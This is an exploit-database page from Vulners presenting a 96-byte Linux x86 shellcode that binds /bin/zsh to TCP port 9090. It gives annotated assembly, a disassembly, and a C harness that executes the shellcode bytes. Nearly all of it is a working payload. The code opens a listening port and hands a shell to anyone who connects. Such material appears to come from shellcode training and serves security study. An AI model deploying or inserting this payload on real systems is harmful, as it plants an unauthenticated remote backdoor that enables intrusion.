Vulners
Lucene search
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
/*
;
; Linux x86
; Author: thryb
; Date: 13-07-16
; Purpose: Bind /bin/zsh to TCP port 9090
; Size: 96 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;
global _start
section .text
_start:
xor eax, eax ; cleaning registers for sanity
xor ebx, ebx
xor edx, edx
xor edi, edi
; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; null
mov al, 0x66 ; sys_socketcall = 102
mov bl, 0x1 ; socketcall() socket = 1
push byte 0x1 ; stack = 0, 1
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
mov ecx, esp ; mov stack ptr to ecx
int 0x80 ; init
; 2 - Bind port
; bind(fd, (struct sockaddr *) &s_addr, 16);
; #define SYS_BIND 2 // sys_bind(2)
xchg edi, eax ; transfer fd to edi
mov al, 0x66 ; sys_socketcall = 102
pop ebx ; sys_bind = 2
pop esi ; = 1
push edx ; stack = [0]
push word 0x8223 ; stack = [0, port_num]
push word bx ; stack = [0, port_num, 2]
push byte 16 ; stack = [0, port_num, 2], 16
push ecx ; stack = [0, port_num, 2], 16, pointer
push edi ; stack = [0, port_num, 2], 16, *ptr, fd
mov ecx, esp ; move stack ptr to ecx
int 0x80 ; init
; 3 - Listen
; listen(fd, 1);
; #define SYS_LISTEN 4 // sys_listen(2)
pop edx ; save fd
mov al, 0x66 ; sys_socketcall = 102
add bl, 0x2 ; bl + 2 (bl 2 from bind)
int 0x80 ; init
; 4 - Accept
; accept(fd, NULL, NULL);
; #define SYS_ACCEPT 5 // sys_accept(2)
push eax ; 0 - NULL
push eax ; 0 - NULL
mov al, 0x66 ; sys_socketcall = 102
inc ebx ; make 5 for listen (4 from listen)
push edx ; push fd on stack
mov ecx, esp ; move stack ptr to ecx
int 0x80 ; init
; 5 - dup
; sys_dup2 = 63 = 0x3f
xchg eax, ebx ; ebx = fd / eax = 5
xor ecx, ecx ; NULL ecx
add cl, 0x2 ; add 2 to counter
dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; sys_dup2
int 0x80 ; init
dec cl ; decrement counter
jns dup2 ; Jump on No Sign (Positive)
; 6 - execve /bin/zsh
; normal execve shell exec
push eax
push 0x68737a2f ; hsz/
push 0x6e69622f ; nib/
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 0xb ; sys_execve (11)
int 0x80 ; init
============================================================================================================
No NULL
./bind-sh-tcp-9090: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 31 d2 xor %edx,%edx
8048066: 31 ff xor %edi,%edi
8048068: 50 push %eax
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 6a 01 push $0x1
804806f: 6a 02 push $0x2
8048071: 89 e1 mov %esp,%ecx
8048073: cd 80 int $0x80
8048075: 97 xchg %eax,%edi
8048076: b0 66 mov $0x66,%al
8048078: 5b pop %ebx
8048079: 5e pop %esi
804807a: 52 push %edx
804807b: 66 68 23 82 pushw $0x8223
804807f: 66 53 push %bx
8048081: 6a 10 push $0x10
8048083: 51 push %ecx
8048084: 57 push %edi
8048085: 89 e1 mov %esp,%ecx
8048087: cd 80 int $0x80
8048089: 5a pop %edx
804808a: b0 66 mov $0x66,%al
804808c: 80 c3 02 add $0x2,%bl
804808f: cd 80 int $0x80
8048091: 50 push %eax
8048092: 50 push %eax
8048093: b0 66 mov $0x66,%al
8048095: 43 inc %ebx
8048096: 52 push %edx
8048097: 89 e1 mov %esp,%ecx
8048099: cd 80 int $0x80
804809b: 93 xchg %eax,%ebx
804809c: 31 c9 xor %ecx,%ecx
804809e: 80 c1 02 add $0x2,%cl
080480a1 <dup2>:
80480a1: b0 3f mov $0x3f,%al
80480a3: cd 80 int $0x80
80480a5: fe c9 dec %cl
80480a7: 79 f8 jns 80480a1 <dup2>
80480a9: 50 push %eax
80480aa: 68 2f 7a 73 68 push $0x68737a2f
80480af: 68 2f 62 69 6e push $0x6e69622f
80480b4: 89 e3 mov %esp,%ebx
80480b6: 50 push %eax
80480b7: 89 e2 mov %esp,%edx
80480b9: 53 push %ebx
80480ba: 89 e1 mov %esp,%ecx
80480bc: b0 0b mov $0xb,%al
80480be: cd 80 int $0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
// ==== Port ====
"\x23\x82"
// ==============
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4